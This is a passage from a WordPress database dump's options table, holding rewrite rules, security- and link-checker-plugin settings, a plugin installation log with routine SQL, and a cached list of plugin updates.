]\";s:37:\"[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\"[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:20:\"([^/]+)/trackback/?$\";s:31:\"index.php?name=$matches[1]&tb=1\";s:40:\"([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:35:\"([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:28:\"([^/]+)/page/?([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&paged=$matches[2]\";s:35:\"([^/]+)/comment-page-([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&cpage=$matches[2]\";s:20:\"([^/]+)(/[0-9]+)?/?$\";s:43:\"index.php?name=$matches[1]&page=$matches[2]\";s:16:\"[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:26:\"[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:46:\"[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:41:\"[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:41:\"[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";}','yes'),(13817,'sm_rewrite_done','$Id: sitemap-loader.php 937300 2014-06-23 18:04:11Z arnee $','yes'),(13818,'yarpp_upgraded','1','yes'),(13820,'WPLANG','','yes'),(14343,'WSD-PLUGIN-CAN-RUN-TASKS','1','yes'),(14344,'wsdplugin_settings','a:15:{s:17:\"fix_hideWpVersion\";a:3:{s:4:\"name\";s:17:\"fix_hideWpVersion\";s:5:\"value\";i:0;s:4:\"desc\";s:55:\"Hide WordPress version for all users but administrators\";}s:34:\"fix_removeWpMetaGeneratorsFrontend\";a:3:{s:4:\"name\";s:34:\"fix_removeWpMetaGeneratorsFrontend\";s:5:\"value\";i:0;s:4:\"desc\";s:84:\"Remove various meta tags generators from the blog\'s head tag for non-administrators.\";}s:31:\"fix_removeReallySimpleDiscovery\";a:3:{s:4:\"name\";s:31:\"fix_removeReallySimpleDiscovery\";s:5:\"value\";i:0;s:4:\"desc\";s:55:\"Remove Really Simple Discovery meta tags from front-end\";}s:27:\"fix_removeWindowsLiveWriter\";a:3:{s:4:\"name\";s:27:\"fix_removeWindowsLiveWriter\";s:5:\"value\";i:0;s:4:\"desc\";s:51:\"Remove Windows Live Writer meta tags from front-end\";}s:25:\"fix_disableErrorReporting\";a:3:{s:4:\"name\";s:25:\"fix_disableErrorReporting\";s:5:\"value\";i:0;s:4:\"desc\";s:61:\"Disable error reporting (php + db) for all but administrators\";}s:32:\"fix_removeCoreUpdateNotification\";a:3:{s:4:\"name\";s:32:\"fix_removeCoreUpdateNotification\";s:5:\"value\";i:0;s:4:\"desc\";s:73:\"Remove core update notifications from back-end for all but administrators\";}s:35:\"fix_removePluginUpdateNotifications\";a:3:{s:4:\"name\";s:35:\"fix_removePluginUpdateNotifications\";s:5:\"value\";i:0;s:4:\"desc\";s:50:\"Remove plug-ins update notifications from back-end\";}s:34:\"fix_removeThemeUpdateNotifications\";a:3:{s:4:\"name\";s:34:\"fix_removeThemeUpdateNotifications\";s:5:\"value\";i:0;s:4:\"desc\";s:48:\"Remove themes update notifications from back-end\";}s:41:\"fix_removeLoginErrorNotificationsFrontEnd\";a:3:{s:4:\"name\";s:41:\"fix_removeLoginErrorNotificationsFrontEnd\";s:5:\"value\";i:0;s:4:\"desc\";s:47:\"Remove login error notifications from front-end\";}s:26:\"fix_hideAdminNotifications\";a:3:{s:4:\"name\";s:26:\"fix_hideAdminNotifications\";s:5:\"value\";i:0;s:4:\"desc\";s:40:\"Hide admin notifications for non admins.\";}s:27:\"fix_preventDirectoryListing\";a:3:{s:4:\"name\";s:27:\"fix_preventDirectoryListing\";s:5:\"value\";i:0;s:4:\"desc\";s:153:\"Try to create the index.php file in the wp-content, wp-content/plugins, wp-content/themes and wp-content/uploads directories to prevent directory listing\";}s:28:\"fix_removeWpVersionFromLinks\";a:3:{s:4:\"name\";s:28:\"fix_removeWpVersionFromLinks\";s:5:\"value\";i:0;s:4:\"desc\";s:38:\"Remove the version parameter from urls\";}s:27:\"fix_emptyReadmeFileFromRoot\";a:3:{s:4:\"name\";s:27:\"fix_emptyReadmeFileFromRoot\";s:5:\"value\";i:0;s:4:\"desc\";s:66:\"Empty the content of the readme.html file from the root directory.\";}s:25:\"keepNumEntriesLiveTraffic\";i:500;s:26:\"liveTrafficRefreshRateAjax\";i:10;}','yes'),(14351,'wsblc_options','{\"max_execution_time\":420,\"check_threshold\":72,\"recheck_count\":3,\"recheck_threshold\":1800,\"run_in_dashboard\":true,\"run_via_cron\":true,\"mark_broken_links\":true,\"broken_link_css\":\".broken_link, a.broken_link {\\n\\ttext-decoration: line-through;\\n}\",\"nofollow_broken_links\":false,\"mark_removed_links\":false,\"removed_link_css\":\".removed_link, a.removed_link {\\n\\ttext-decoration: line-through;\\n}\",\"exclusion_list\":[],\"send_email_notifications\":true,\"send_authors_email_notifications\":false,\"notification_email_address\":\"\",\"notification_schedule\":\"daily\",\"last_notification_sent\":0,\"suggestions_enabled\":true,\"warnings_enabled\":true,\"server_load_limit\":14,\"enable_load_limit\":true,\"custom_fields\":[],\"enabled_post_statuses\":[\"publish\"],\"autoexpand_widget\":true,\"dashboard_widget_capability\":\"edit_others_posts\",\"show_link_count_bubble\":true,\"table_layout\":\"flexible\",\"table_compact\":true,\"table_visible_columns\":[\"new-url\",\"status\",\"used-in\",\"new-link-text\"],\"table_links_per_page\":30,\"table_color_code_status\":true,\"need_resynch\":false,\"current_db_version\":8,\"timeout\":30,\"highlight_permanent_failures\":false,\"failure_duration_threshold\":3,\"logging_enabled\":false,\"log_file\":\"\",\"custom_log_file_enabled\":false,\"installation_complete\":true,\"installation_flag_cleared_on\":\"2015-03-17T14:09:08+00:00 (1426601348.1545)\",\"installation_flag_set_on\":\"2015-03-17T14:09:09+00:00 (1426601349.6799)\",\"user_has_donated\":false,\"donation_flag_fixed\":false,\"show_link_actions\":{\"blc-deredirect-action\":false},\"first_installation_timestamp\":1426601348,\"active_modules\":{\"http\":{\"ModuleID\":\"http\",\"ModuleCategory\":\"checker\",\"ModuleContext\":\"on-demand\",\"ModuleLazyInit\":true,\"ModuleClassName\":\"blcHttpChecker\",\"ModulePriority\":-1,\"ModuleCheckerUrlPattern\":\"\",\"ModuleHidden\":false,\"ModuleAlwaysActive\":false,\"ModuleRequiresPro\":false,\"Name\":\"Basic HTTP\",\"PluginURI\":\"\",\"Version\":\"1.0\",\"Description\":\"Check all links that have the HTTP\\/HTTPS protocol.\",\"Author\":\"Janis Elsts\",\"AuthorURI\":\"\",\"TextDomain\":\"broken-link-checker\",\"DomainPath\":\"\",\"Network\":false,\"Title\":\"Basic HTTP\",\"AuthorName\":\"Janis Elsts\",\"file\":\"checkers\\/http.php\"},\"link\":{\"ModuleID\":\"link\",\"ModuleCategory\":\"parser\",\"ModuleContext\":\"on-demand\",\"ModuleLazyInit\":true,\"ModuleClassName\":\"blcHTMLLink\",\"ModulePriority\":1000,\"ModuleCheckerUrlPattern\":\"\",\"ModuleHidden\":false,\"ModuleAlwaysActive\":false,\"ModuleRequiresPro\":false,\"Name\":\"HTML links\",\"PluginURI\":\"\",\"Version\":\"1.0\",\"Description\":\"Example : <a href=\\\"http:\\/\\/example.com\\/\\\">link text<\\/a><\\/code>\",\"Author\":\"Janis Elsts\",\"AuthorURI\":\"\",\"TextDomain\":\"broken-link-checker\",\"DomainPath\":\"\",\"Network\":false,\"Title\":\"HTML links\",\"AuthorName\":\"Janis Elsts\",\"file\":\"parsers\\/html_link.php\"},\"image\":{\"ModuleID\":\"image\",\"ModuleCategory\":\"parser\",\"ModuleContext\":\"on-demand\",\"ModuleLazyInit\":true,\"ModuleClassName\":\"blcHTMLImage\",\"ModulePriority\":900,\"ModuleCheckerUrlPattern\":\"\",\"ModuleHidden\":false,\"ModuleAlwaysActive\":false,\"ModuleRequiresPro\":false,\"Name\":\"HTML images\",\"PluginURI\":\"\",\"Version\":\"1.0\",\"Description\":\"e.g. <img src=\\\"http:\\/\\/example.com\\/fluffy.jpg\\\"><\\/code>\",\"Author\":\"Janis Elsts\",\"AuthorURI\":\"\",\"TextDomain\":\"broken-link-checker\",\"DomainPath\":\"\",\"Network\":false,\"Title\":\"HTML images\",\"AuthorName\":\"Janis Elsts\",\"file\":\"parsers\\/image.php\"},\"metadata\":{\"ModuleID\":\"metadata\",\"ModuleCategory\":\"parser\",\"ModuleContext\":\"on-demand\",\"ModuleLazyInit\":true,\"ModuleClassName\":\"blcMetadataParser\",\"ModulePriority\":0,\"ModuleCheckerUrlPattern\":\"\",\"ModuleHidden\":true,\"ModuleAlwaysActive\":true,\"ModuleRequiresPro\":false,\"Name\":\"Metadata\",\"PluginURI\":\"\",\"Version\":\"1.0\",\"Description\":\"Parses metadata (AKA custom fields)\",\"Author\":\"Janis Elsts\",\"AuthorURI\":\"\",\"TextDomain\":\"broken-link-checker\",\"DomainPath\":\"\",\"Network\":false,\"Title\":\"Metadata\",\"AuthorName\":\"Janis Elsts\",\"file\":\"parsers\\/metadata.php\"},\"url_field\":{\"ModuleID\":\"url_field\",\"ModuleCategory\":\"parser\",\"ModuleContext\":\"on-demand\",\"ModuleLazyInit\":true,\"ModuleClassName\":\"blcUrlField\",\"ModulePriority\":0,\"ModuleCheckerUrlPattern\":\"\",\"ModuleHidden\":true,\"ModuleAlwaysActive\":true,\"ModuleRequiresPro\":false,\"Name\":\"URL fields\",\"PluginURI\":\"\",\"Version\":\"1.0\",\"Description\":\"Parses data fields that contain a single, plaintext URL.\",\"Author\":\"Janis Elsts\",\"AuthorURI\":\"\",\"TextDomain\":\"broken-link-checker\",\"DomainPath\":\"\",\"Network\":false,\"Title\":\"URL fields\",\"AuthorName\":\"Janis Elsts\",\"file\":\"parsers\\/url_field.php\"},\"comment\":{\"ModuleID\":\"comment\",\"ModuleCategory\":\"container\",\"ModuleContext\":\"all\",\"ModuleLazyInit\":false,\"ModuleClassName\":\"blcCommentManager\",\"ModulePriority\":0,\"ModuleCheckerUrlPattern\":\"\",\"ModuleHidden\":false,\"ModuleAlwaysActive\":false,\"ModuleRequiresPro\":false,\"Name\":\"Comments\",\"PluginURI\":\"\",\"Version\":\"1.0\",\"Description\":\"\",\"Author\":\"Janis Elsts\",\"AuthorURI\":\"\",\"TextDomain\":\"broken-link-checker\",\"DomainPath\":\"\",\"Network\":false,\"Title\":\"Comments\",\"AuthorName\":\"Janis Elsts\",\"file\":\"containers\\/comment.php\"},\"post\":{\"Name\":\"Posts\",\"ModuleCategory\":\"container\",\"ModuleContext\":\"all\",\"ModuleClassName\":\"blcAnyPostContainerManager\",\"ModuleID\":\"post\",\"file\":\"\",\"ModuleLazyInit\":false,\"ModulePriority\":0,\"ModuleHidden\":false,\"ModuleAlwaysActive\":false,\"ModuleRequiresPro\":false,\"TextDomain\":\"broken-link-checker\",\"virtual\":true},\"page\":{\"Name\":\"Pages\",\"ModuleCategory\":\"container\",\"ModuleContext\":\"all\",\"ModuleClassName\":\"blcAnyPostContainerManager\",\"ModuleID\":\"page\",\"file\":\"\",\"ModuleLazyInit\":false,\"ModulePriority\":0,\"ModuleHidden\":false,\"ModuleAlwaysActive\":false,\"ModuleRequiresPro\":false,\"TextDomain\":\"broken-link-checker\",\"virtual\":true},\"youtube-checker\":{\"ModuleID\":\"youtube-checker\",\"ModuleCategory\":\"checker\",\"ModuleContext\":\"on-demand\",\"ModuleLazyInit\":true,\"ModuleClassName\":\"blcYouTubeChecker\",\"ModulePriority\":100,\"ModuleCheckerUrlPattern\":\"@^https?:\\/\\/(?:([\\\\w\\\\d]+\\\\.)*youtube\\\\.[^\\/]+\\/watch\\\\?.*v=[^\\/#]|youtu\\\\.be\\/[^\\/#\\\\?]+|(?:[\\\\w\\\\d]+\\\\.)*?youtube\\\\.[^\\/]+\\/(playlist|view_play_list)\\\\?[^\\/#]{15,}?)@i\",\"ModuleHidden\":false,\"ModuleAlwaysActive\":false,\"ModuleRequiresPro\":false,\"Name\":\"YouTube API\",\"PluginURI\":\"\",\"Version\":\"1.1\",\"Description\":\"Check links to YouTube videos and playlists using the YouTube API.\",\"Author\":\"Janis Elsts\",\"AuthorURI\":\"\",\"TextDomain\":\"broken-link-checker\",\"DomainPath\":\"\",\"Network\":false,\"Title\":\"YouTube API\",\"AuthorName\":\"Janis Elsts\",\"file\":\"extras\\/youtube.php\"},\"youtube-iframe\":{\"ModuleID\":\"youtube-iframe\",\"ModuleCategory\":\"parser\",\"ModuleContext\":\"on-demand\",\"ModuleLazyInit\":true,\"ModuleClassName\":\"blcYouTubeIframe\",\"ModulePriority\":120,\"ModuleCheckerUrlPattern\":\"\",\"ModuleHidden\":false,\"ModuleAlwaysActive\":false,\"ModuleRequiresPro\":false,\"Name\":\"Embedded YouTube videos\",\"PluginURI\":\"\",\"Version\":\"1.0\",\"Description\":\"Parse embedded videos from YouTube\",\"Author\":\"Janis Elsts\",\"AuthorURI\":\"\",\"TextDomain\":\"broken-link-checker\",\"DomainPath\":\"\",\"Network\":false,\"Title\":\"Embedded YouTube videos\",\"AuthorName\":\"Janis Elsts\",\"file\":\"extras\\/youtube-iframe.php\"},\"dummy\":{\"ModuleID\":\"dummy\",\"ModuleCategory\":\"container\",\"ModuleContext\":\"all\",\"ModuleLazyInit\":false,\"ModuleClassName\":\"blcDummyManager\",\"ModulePriority\":0,\"ModuleCheckerUrlPattern\":\"\",\"ModuleHidden\":true,\"ModuleAlwaysActive\":true,\"ModuleRequiresPro\":false,\"Name\":\"Dummy\",\"PluginURI\":\"\",\"Version\":\"1.0\",\"Description\":\"\",\"Author\":\"Janis Elsts\",\"AuthorURI\":\"\",\"TextDomain\":\"broken-link-checker\",\"DomainPath\":\"\",\"Network\":false,\"Title\":\"Dummy\",\"AuthorName\":\"Janis Elsts\",\"file\":\"containers\\/dummy.php\"}},\"module_deactivated_when\":{\"custom_field\":1426601348},\"plugin_news\":[\"Admin Menu Editor\",\"http:\\/\\/wordpress.org\\/extend\\/plugins\\/admin-menu-editor\\/\"]}','yes'),(14352,'blc_installation_log','a:63:{i:0;a:3:{i:0;i:1;i:1;s:40:\"Plugin activated at 2015-03-17 14:09:08.\";i:2;N;}i:1;a:3:{i:0;i:1;i:1;s:27:\"Installation/update begins.\";i:2;N;}i:2;a:3:{i:0;i:1;i:1;s:25:\"Upgrading the database...\";i:2;N;}i:3;a:3:{i:0;i:1;i:1;s:31:\"... SHOW TABLES (0.000 seconds)\";i:2;N;}i:4;a:3:{i:0;i:1;i:1;s:237:\" [OK] \r\n CREATE TABLE IF NOT EXISTS `w_blc_filters` (\r\n `id` int(10) unsigned NOT NULL AUTO_INCREMENT,\r\n `name` varchar(100) NOT NULL,\r\n `params` text NOT NULL,\r\n \r\n PRIMARY KEY (`id`)\r\n ) DEFAULT CHARACTER SET utf8 (0.412 seconds)\";i:2;N;}i:5;a:3:{i:0;i:1;i:1;s:704:\" [OK] \r\n \r\n CREATE TABLE IF NOT EXISTS `w_blc_instances` (\r\n `instance_id` int(10) unsigned NOT NULL AUTO_INCREMENT,\r\n `link_id` int(10) unsigned NOT NULL,\r\n `container_id` int(10) unsigned NOT NULL,\r\n `container_type` varchar(40) NOT NULL DEFAULT \'post\',\r\n `link_text` varchar(250) NOT NULL DEFAULT \'\',\r\n `parser_type` varchar(40) NOT NULL DEFAULT \'link\',\r\n `container_field` varchar(250) NOT NULL DEFAULT \'\',\r\n `link_context` varchar(250) NOT NULL DEFAULT \'\',\r\n `raw_url` text NOT NULL,\r\n \r\n PRIMARY KEY (`instance_id`),\r\n KEY `link_id` (`link_id`),\r\n KEY `source_id` (`container_type`, `container_id`),\r\n KEY `parser_type` (`parser_type`)\r\n ) DEFAULT CHARACTER SET utf8 (0.261 seconds)\";i:2;N;}i:6;a:3:{i:0;i:1;i:1;s:1470:\" [OK] \r\n \r\n CREATE TABLE IF NOT EXISTS `w_blc_links` (\r\n `link_id` int(20) unsigned NOT NULL AUTO_INCREMENT,\r\n `url` text CHARACTER SET utf8 COLLATE utf8_bin NOT NULL,\r\n `first_failure` datetime NOT NULL DEFAULT \'0000-00-00 00:00:00\',\r\n `last_check` datetime NOT NULL DEFAULT \'0000-00-00 00:00:00\',\r\n `last_success` datetime NOT NULL DEFAULT \'0000-00-00 00:00:00\',\r\n `last_check_attempt` datetime NOT NULL DEFAULT \'0000-00-00 00:00:00\',\r\n `check_count` int(4) unsigned NOT NULL DEFAULT \'0\',\r\n `final_url` text CHARACTER SET latin1 COLLATE latin1_general_cs NOT NULL,\r\n `redirect_count` smallint(5) unsigned NOT NULL DEFAULT \'0\',\r\n `log` text NOT NULL,\r\n `http_code` smallint(6) NOT NULL DEFAULT \'0\',\r\n `status_code` varchar(100) DEFAULT \'\',\r\n `status_text` varchar(250) DEFAULT \'\',\r\n `request_duration` float NOT NULL DEFAULT \'0\',\r\n `timeout` tinyint(1) unsigned NOT NULL DEFAULT \'0\',\r\n `broken` tinyint(1) unsigned NOT NULL DEFAULT \'0\',\r\n `warning` tinyint(1) unsigned NOT NULL DEFAULT \'0\',\r\n `may_recheck` tinyint(1) NOT NULL DEFAULT \'1\',\r\n `being_checked` tinyint(1) NOT NULL DEFAULT \'0\',\r\n\r\n `result_hash` varchar(200) NOT NULL DEFAULT \'\',\r\n `false_positive` tinyint(1) NOT NULL DEFAULT \'0\',\r\n `dismissed` tinyint(1) NOT NULL DEFAULT \'0\',\r\n \r\n PRIMARY KEY (`link_id`),\r\n KEY `url` (`url`(150)),\r\n KEY `final_url` (`final_url`(150)),\r\n KEY `http_code` (`http_code`),\r\n KEY `broken` (`broken`)\r\n ) DEFAULT CHARACTER SET utf8 (0.276 seconds)\";i:2;N;}i:7;a:3:{i:0;i:1;i:1;s:379:\" [OK] \r\n \r\n CREATE TABLE IF NOT EXISTS `w_blc_synch` (\r\n `container_id` int(20) unsigned NOT NULL,\r\n `container_type` varchar(40) NOT NULL,\r\n `synched` tinyint(2) unsigned NOT NULL,\r\n `last_synch` datetime NOT NULL DEFAULT \'0000-00-00 00:00:00\',\r\n \r\n PRIMARY KEY (`container_type`,`container_id`),\r\n KEY `synched` (`synched`)\r\n ) DEFAULT CHARACTER SET utf8 (0.234 seconds)\";i:2;N;}i:8;a:3:{i:0;i:1;i:1;s:32:\"Schema update took 1.183 seconds\";i:2;N;}i:9;a:3:{i:0;i:1;i:1;s:24:\"Database schema updated.\";i:2;N;}i:10;a:3:{i:0;i:1;i:1;s:31:\"Database successfully upgraded.\";i:2;N;}i:11;a:3:{i:0;i:1;i:1;s:24:\"--- Total: 1.185 seconds\";i:2;N;}i:12;a:3:{i:0;i:1;i:1;s:27:\"Cleaning up the database...\";i:2;N;}i:13;a:3:{i:0;i:1;i:1;s:38:\"... Deleting invalid container records\";i:2;N;}i:14;a:3:{i:0;i:0;i:1;s:44:\"... 0 synch records deleted in 0.000 seconds\";i:2;N;}i:15;a:3:{i:0;i:1;i:1;s:35:\"... Deleting invalid link instances\";i:2;N;}i:16;a:3:{i:0;i:0;i:1;s:40:\"... 0 instances deleted in 0.001 seconds\";i:2;N;}i:17;a:3:{i:0;i:0;i:1;s:45:\"... 0 more instances deleted in 0.000 seconds\";i:2;N;}i:18;a:3:{i:0;i:1;i:1;s:27:\"... Deleting orphaned links\";i:2;N;}i:19;a:3:{i:0;i:0;i:1;s:36:\"... 0 links deleted in 0.000 seconds\";i:2;N;}i:20;a:3:{i:0;i:1;i:1;s:24:\"--- Total: 0.002 seconds\";i:2;N;}i:21;a:3:{i:0;i:1;i:1;s:20:\"Notifying modules...\";i:2;N;}i:22;a:3:{i:0;i:0;i:1;s:25:\"... Updating module cache\";i:2;N;}i:23;a:3:{i:0;i:1;i:1;s:36:\"... Cache refresh took 0.000 seconds\";i:2;N;}i:24;a:3:{i:0;i:0;i:1;s:19:\"... Loading modules\";i:2;N;}i:25;a:3:{i:0;i:1;i:1;s:37:\"... 5 modules loaded in 0.001 seconds\";i:2;N;}i:26;a:3:{i:0;i:0;i:1;s:27:\"... Notifying module \"http\"\";i:2;N;}i:27;a:3:{i:0;i:0;i:1;s:27:\"... Notifying module \"link\"\";i:2;N;}i:28;a:3:{i:0;i:0;i:1;s:28:\"... Notifying module \"image\"\";i:2;N;}i:29;a:3:{i:0;i:0;i:1;s:31:\"... Notifying module \"metadata\"\";i:2;N;}i:30;a:3:{i:0;i:0;i:1;s:32:\"... Notifying module \"url_field\"\";i:2;N;}i:31;a:3:{i:0;i:0;i:1;s:30:\"... Notifying module \"comment\"\";i:2;N;}i:32;a:3:{i:0;i:0;i:1;s:51:\"...... Deleting synch. records for removed comments\";i:2;N;}i:33;a:3:{i:0;i:0;i:1;s:38:\"...... 0 rows deleted in 0.000 seconds\";i:2;N;}i:34;a:3:{i:0;i:0;i:1;s:47:\"...... Creating synch. records for new comments\";i:2;N;}i:35;a:3:{i:0;i:0;i:1;s:39:\"...... 0 rows inserted in 0.121 seconds\";i:2;N;}i:36;a:3:{i:0;i:0;i:1;s:27:\"... Notifying module \"post\"\";i:2;N;}i:37;a:3:{i:0;i:0;i:1;s:47:\"...... Deleting synch records for removed posts\";i:2;N;}i:38;a:3:{i:0;i:0;i:1;s:205:\"DELETE synch.*\r\n FROM \r\n w_blc_synch AS synch LEFT JOIN w_posts AS posts\r\n ON posts.ID = synch.container_id\r\n WHERE \r\n synch.container_type IN (\'page\', \'post\') AND posts.ID IS NULL\";i:2;N;}i:39;a:3:{i:0;i:0;i:1;s:38:\"...... 0 rows deleted in 0.000 seconds\";i:2;N;}i:40;a:3:{i:0;i:0;i:1;s:69:\"...... Deleting synch records for posts that have a disallowed status\";i:2;N;}i:41;a:3:{i:0;i:0;i:1;s:230:\"DELETE synch.*\r\n FROM\r\n w_blc_synch AS synch\r\n LEFT JOIN w_posts AS posts\r\n ON (synch.container_id = posts.ID and synch.container_type = posts.post_type)\r\n WHERE\r\n posts.post_status NOT IN (\'publish\')\";i:2;N;}i:42;a:3:{i:0;i:0;i:1;s:38:\"...... 0 rows deleted in 0.000 seconds\";i:2;N;}i:43;a:3:{i:0;i:0;i:1;s:41:\"...... Marking changed posts as unsynched\";i:2;N;}i:44;a:3:{i:0;i:0;i:1;s:225:\"UPDATE\r\n w_blc_synch AS synch\r\n JOIN w_posts AS posts ON (synch.container_id = posts.ID and synch.container_type=posts.post_type)\r\n SET \r\n synched = 0\r\n WHERE\r\n synch.last_synch < posts.post_modified\";i:2;N;}i:45;a:3:{i:0;i:0;i:1;s:38:\"...... 0 rows updated in 0.000 seconds\";i:2;N;}i:46;a:3:{i:0;i:0;i:1;s:43:\"...... Creating synch records for new posts\";i:2;N;}i:47;a:3:{i:0;i:0;i:1;s:397:\"INSERT INTO w_blc_synch(container_id, container_type, synched)\r\n SELECT posts.id, posts.post_type, 0\r\n FROM \r\n w_posts AS posts LEFT JOIN w_blc_synch AS synch\r\n ON (synch.container_id = posts.ID and synch.container_type=posts.post_type) \r\n WHERE\r\n posts.post_status IN (\'publish\')\r\n AND posts.post_type IN (\'page\', \'post\')\r\n AND synch.container_id IS NULL\";i:2;N;}i:48;a:3:{i:0;i:0;i:1;s:39:\"...... 2 rows inserted in 0.000 seconds\";i:2;N;}i:49;a:3:{i:0;i:0;i:1;s:27:\"... Notifying module \"page\"\";i:2;N;}i:50;a:3:{i:0;i:0;i:1;s:74:\"...... Skipping \"page\" resyncyh since all post types were already synched.\";i:2;N;}i:51;a:3:{i:0;i:0;i:1;s:38:\"... Notifying module \"youtube-checker\"\";i:2;N;}i:52;a:3:{i:0;i:0;i:1;s:37:\"... Notifying module \"youtube-iframe\"\";i:2;N;}i:53;a:3:{i:0;i:0;i:1;s:28:\"... Notifying module \"dummy\"\";i:2;N;}i:54;a:3:{i:0;i:1;i:1;s:24:\"--- Total: 0.128 seconds\";i:2;N;}i:55;a:3:{i:0;i:1;i:1;s:38:\"Updating server load limit settings...\";i:2;N;}i:56;a:3:{i:0;i:1;i:1;s:61:\"Set server load limit to 14.00. Current load average is 12.17\";i:2;N;}i:57;a:3:{i:0;i:1;i:1;s:26:\"Optimizing the database...\";i:2;N;}i:58;a:3:{i:0;i:1;i:1;s:24:\"--- Total: 0.178 seconds\";i:2;N;}i:59;a:3:{i:0;i:1;i:1;s:26:\"Completing installation...\";i:2;N;}i:60;a:3:{i:0;i:1;i:1;s:20:\"Configuration saved.\";i:2;N;}i:61;a:3:{i:0;i:1;i:1;s:78:\"Installation/update completed at 2015-03-17 14:09:09 with 24 queries executed.\";i:2;N;}i:62;a:3:{i:0;i:1;i:1;s:25:\"Total time: 1.527 seconds\";i:2;N;}}','yes'),(14354,'SWPA_PLUGIN_ENTRIES_LIVE_TRAFFIC','509','yes'),(14355,'_transient_is_multi_author','0','yes'),(29590,'_transient_timeout_feed_mod_08a9370cca8e4bda25c11f8557e93830','1472864429','no'),(29591,'_transient_feed_mod_08a9370cca8e4bda25c11f8557e93830','1472259629','no'),(29602,'_site_transient_update_plugins','O:8:\"stdClass\":4:{s:12:\"last_checked\";i:1472740350;s:8:\"response\";a:6:{s:26:\"secure-wordpress/index.php\";O:8:\"stdClass\":6:{s:2:\"id\";s:4:\"3682\";s:4:\"slug\";s:16:\"secure-wordpress\";s:6:\"plugin\";s:26:\"secure-wordpress/index.php\";s:11:\"new_version\";s:5:\"3.0.4\";s:3:\"url\";s:47:\"https://wordpress.org/plugins/secure-wordpress/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/plugin/secure-wordpress.zip\";}s:43:\"all-in-one-seo-pack/all_in_one_seo_pack.php\";O:8:\"stdClass\":6:{s:2:\"id\";s:3:\"520\";s:4:\"slug\";s:19:\"all-in-one-seo-pack\";s:6:\"plugin\";s:43:\"all-in-one-seo-pack/all_in_one_seo_pack.php\";s:11:\"new_version\";s:7:\"2.3.9.1\";s:3:\"url\";s:50:\"https://wordpress.org/plugins/all-in-one-seo-pack/\";s:7:\"package\";s:70:\"https://downloads.wordpress.org/plugin/all-in-one-seo-pack.2.3.9.1.zip\";}s:43:\"broken-link-checker/broken-link-checker.php\";O:8:\"stdClass\":6:{s:2:\"id\";s:4:\"1090\";s:4:\"slug\";s:19:\"broken-link-checker\";s:6:\"plugin\";s:43:\"broken-link-checker/broken-link-checker.php\";s:11:\"new_version\";s:6:\"1.11.2\";s:3:\"url\";s:50:\"https://wordpress.org/plugins/broken-link-checker/\";s:7:\"package\";s:69:\"https://downloads.wordpress.org/plugin/broken-link-checker.1.11.2.zip\";}s:27:\"wp-pagenavi/wp-pagenavi.php\";O:8:\"stdClass\":6:{s:2:\"id\";s:3:\"363\";s:4:\"slug\";s:11:\"wp-pagenavi\";s:6:\"plugin\";s:27:\"wp-pagenavi/wp-pagenavi.php\";s:11:\"new_version\";s:4:\"2.91\";s:3:\"url\";s:42:\"https://wordpress.org/plugins/wp-pagenavi/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/plugin/wp-pagenavi.2.91.zip\";}s:27:\"wp-spamfree/wp-spamfree.php\";O:8:\"stdClass\":6:{s:2:\"id\";s:4:\"1303\";s:4:\"slug\";s:11:\"wp-spamfree\";s:6:\"plugin\";s:27:\"wp-spamfree/wp-spamfree.php\";s:11:\"new_version\";s:7:\"2.1.1.5\";s:3:\"url\";s:42:\"https://wordpress.org/plugins/wp-spamfree/\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/plugin/wp-spamfree.2.1.1.5.zip\";}s:42:\"yet-another-related-posts-plugin/yarpp.php\";O:8:\"stdClass\":6:{s:2:\"id\";s:4:\"1418\";s:4:\"slug\";s:32:\"yet-another-related-posts-plugin\";s:6:\"plugin\";s:42:\"yet-another-related-posts-plugin/yarpp.php\";s:11:\"new_version\";s:5:\"4.3.1\";s:3:\"url\";s:63:\"https://wordpress.org/plugins/yet-another-related-posts-plugin/\";s:7:\"package\";s:81:\"https://downloads.wordpress.org/plugin/yet-another-related-posts-plugin.4.3.1.zip\";}}s:12:\"translations\";a:0:{}s:9:\"no_update\";a:4:{s:36:\"google-sitemap-generator/sitemap.php\";O:8:\"stdClass\":6:{s:2:\"id\";s:3:\"132\";s:4:\"slug\";s:24:\"google-sitemap-generator\";s:6:\"plugin\";s:36:\"google-sitemap-generator/sitemap.php\";s:11:\"new_version\";s:5:\"4.0.8\";s:3:\"url\";s:55:\"https://wordpress.org/plugins/google-sitemap-generator/\";s:7:\"package\";s:73:\"https://downloads.wordpress.org/plugin/google-sitemap-generator.4.0.8.zip\";}s:39:\"link-juice-keeper/link-juice-keeper.php\";O:8:\"stdClass\":6:{s:2:\"id\";s:4:\"7655\";s:4:\"slug\";s:17:\"link-juice-keeper\";s:6:\"plugin\";s:39:\"link-juice-keeper/link-juice-keeper.php\";s:11:\"new_version\";s:5:\"1.2.3\";s:3:\"url\";s:48:\"https://wordpress.org/plugins/link-juice-keeper/\";s:7:\"package\";s:66:\"https://downloads.wordpress.org/plugin/link-juice-keeper.1.2.3.zip\";}s:59:\"simp